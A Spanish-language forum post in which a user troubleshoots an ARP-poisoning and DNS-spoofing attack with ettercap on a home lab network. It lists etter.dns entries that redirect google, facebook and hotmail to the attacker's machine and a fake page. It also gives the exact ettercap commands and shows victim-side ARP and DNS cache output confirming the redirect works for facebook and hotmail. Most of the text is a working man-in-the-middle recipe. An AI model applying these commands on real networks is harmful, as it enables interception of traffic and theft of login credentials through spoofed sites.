He probado el procedimiento solo funciona
envenenado toda la red, pero con google parece imposible por ahora, he realizado la prueba con facebook y con hotmail y el DNS_SPOOF funciona perfectamente.
En mi caso
192.168.1.1 --> Router
192.168.1.35 --> Bactrack
192.168.1.34 --> Victima (Win 7) (Pruebas con IExplorer 9 y Firefox 14
Extracto de etter.dns -->
*.google.* A 192.168.1.35
*.facebook.* A 192.168.1.35
*.hotmail.* A 192.168.1.35
###############################################
Comienzo el ataque:
ettercap -T -q -P dns_spoof -M arp /192.168.1.1/ /192.168.1.34/Consulto las tablas ARP en Win 7:
C:\Users\Tom>arp -aInterfaz: 192.168.1.34 --- 0xb
Dirección de Internet Dirección física Tipo
192.168.1.1 08-00-27-1c-2d-bd dinámico
192.168.1.33 08-00-27-fd-7c-58 dinámico
192.168.1.35 08-00-27-1c-2d-bd dinámico
Vacio la cache de DNS en Win 7:
C:\Users\Tom>ipconfig /flushdns Configuración IP de Windows
Se vació correctamente la caché de resolución de DNS.Intento abric google,facebook y hotmail, no obteniendo los resultados esperados (DNSSPOOF),se siguen abriendo las páginas originales.
Si el envenenamiento lo realizo de la suiguiente manera:
ettercap -T -q -P dns_spoof -M arp // //si funciona con facebook y con hotmail, pero curiosamente Google no es redireccionado hacia mi página falsa.
Si desde Windows analizo las resoluciones almacenadas hasta el momento,se observa que aunque la resolucion para google es la correcta (con mi etter.dns), la página no abre.
C:\Users\Tom>ipconfig /displaydns Configuración IP de Windows
www.facebook.com
----------------------------------------
Nombre de registro . : www.facebook.com
Tipo de registro . . : 1
Período de vida . . . : 3581
Longitud de datos . . : 4
Sección . . . . . . . : respuesta
Un registro (host). . : 192.168.1.35
www.hotmail.es
----------------------------------------
Nombre de registro . : www.hotmail.es
Tipo de registro . . : 1
Período de vida . . . : 3590
Longitud de datos . . : 4
Sección . . . . . . . : respuesta
Un registro (host). . : 192.168.1.35
www.google.es
----------------------------------------
Nombre de registro . : www.google.es
Tipo de registro . . : 1
Período de vida . . . : 3566
Longitud de datos . . : 4
Sección . . . . . . . : respuesta
Un registro (host). . : 192.168.1.35
En ambos navegadores tengo como página de inicio predeterminada www.google.es, no se
si tiene algo que ver con el fallo del DNS_SPOOF.